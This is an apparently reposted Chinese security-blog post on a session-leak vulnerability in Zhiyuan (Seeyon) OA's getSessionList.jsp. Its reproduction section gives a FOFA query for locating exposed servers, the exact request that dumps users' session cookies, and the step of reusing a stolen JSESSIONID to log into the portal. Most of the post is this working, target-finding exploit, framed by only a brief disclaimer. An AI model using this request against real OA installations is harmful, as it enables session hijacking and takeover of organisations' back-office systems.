致远OA getSessionList.jsp Session泄漏漏洞

本文转载于公众号:融云攻防实验室,原文地址:

0x01 阅读须知

资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明

0x02 漏洞描述

致远OA办公自动化软件,用于OA办公自动化软件的开发销售。2010年,用友致远更名为致远协创。2017年更名为致远互联。北京致远互联软件股份有限公司(简称:致远互联)成立于2002年3月,总部设立在北京,是一家集协同办公产品的设计、研发、销售及服务为一体的企业。致远OA A6-m等业务系统,getSessionList.jsp处存在Session泄漏漏洞,攻击者通过漏洞可以获取登录cookie,导致业务后台失陷。

图片[1]-致远OA getSessionList.jsp Session泄漏漏洞-安全小天地

0x03 漏洞复现

fofa:app=”致远互联-OA”

1.执行POC读取用户cookie

/yyoa/ext/https/getSessionList.jsp?cmd=getAll
图片[2]-致远OA getSessionList.jsp Session泄漏漏洞-安全小天地

2.使用session登录主页即可


http://x.x.x.x/yyoa/portal/portalIndex.jsp
JSESSIONID=XXXXXXXXXXXXXXXXXXXXXXXXXXX
图片[3]-致远OA getSessionList.jsp Session泄漏漏洞-安全小天地
------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞6 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容